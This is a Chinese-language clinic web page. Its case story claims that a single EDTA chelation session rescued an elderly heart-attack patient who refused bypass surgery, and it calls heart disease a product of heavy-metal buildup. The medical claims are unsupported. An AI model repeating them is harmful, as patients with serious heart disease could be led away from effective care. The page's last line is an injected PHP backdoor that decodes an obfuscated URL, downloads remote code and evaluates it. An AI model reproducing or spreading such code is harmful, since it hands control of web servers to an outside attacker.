收藏本站
首頁 arrow 螯療案例 arrow 老先生險渡心肌梗塞難關!
老先生險渡心肌梗塞難關! 列印 E-mail

    在臨床上,我曾看見一位七十多歲、被診斷為急性心肌梗塞的老先生,在做過心導管手術後,發現三條冠狀動脈均罹患血管阻塞合併鈣化,不能使用支架改善冠狀動脈循環,只能做血管繞道手術。

患者寧死不從,只好用螯合療法試看看。

老先生從南部北上當天,胸痛、暈眩,感覺好像要中風一樣;但經過一次螯合療法治療後,隔天他竟邀集兄弟姐妹到家中快樂的打麻將。

據其子女轉述他的感覺是「前後判若兩人」。

直到經過那麼多年以後的現在,這些疾病的致病原因才真正被正視為「體內重金屬累積所導致的退化性疾病」,而「螯合並去除重金屬」,改善動脈硬化,造成退化性疾病的復原,這就是螯合 療法最主要的功效!



註:起初亞伯特與戈登兩位教授使用EDTA並沒有立即獲得療效,其原因推論有二:

一、當時的螯合療法尚在實驗階段,關於疾病與劑量的掌握尚未精準純熟,因而效果並
        不明顯,但對於已被放棄治療的病人而言,沒有繼續惡化,其實就是很大的進步。
      (現今專業合格、能夠執行螯合療法的醫師,對於如何安全而有效的使用EDTA早
        已毋庸置疑)。

二、此時剛巧為病患的好轉反應期,有些患者無法看見立即的療效,會重現舊有臨床症
       狀的重現;但一定是依照疾病發生的先後以「倒序方式」陸續呈現,而後即可見類
        似奇蹟似快速改善的療效。


所有個案案例均為重點摘要
詳文,請至各大書局或網路書局購買(書泉出版社)九八年五月印行
劉大元醫師所著不一樣的另類醫學

 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));